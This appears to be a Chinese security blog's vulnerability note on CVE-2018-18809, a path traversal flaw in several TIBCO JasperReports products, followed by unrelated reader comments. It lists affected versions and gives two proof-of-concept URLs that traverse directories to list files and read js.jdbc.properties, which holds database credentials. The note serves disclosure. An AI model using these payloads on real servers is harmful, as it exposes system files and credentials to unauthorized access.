CVE-2018-18809
漏洞描述:多款TIBCO Software产品中的默认服务器配置组件存在路径遍历漏洞。攻击者可利用该漏洞访问主机系统内容。以下产品和版本受到影响:TIBCO JasperReports Library 6.3.4版本,6.4.1版本,6.4.2版本,6.4.21版本,7.1.0版本,7.2.0版本;TIBCO JasperReports Library(社区版)6.7.0及之前版本,7.1.0及之前版本;适用于ActiveMatrix BPM的TIBCO JasperReports Library 6.4.3及之前版本;TIBCO Jaspersoft for AWS with Multi-Tenancy 7.1.0及之前版本;适用于AWS的TIBCO Jaspersoft Reporting and Analytics 7.1.0及之前版本。
参考资料:
CVE-2018-18809 Path traversal in Tibco JasperSoft
POC:
读取文件列表:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../
读取文件内容(以js.jdbc.properties为例):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
漏洞复现:
- 环境有问题,复现不来
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 38天前0
好的,谢谢昶之琴 40天前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 40天前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下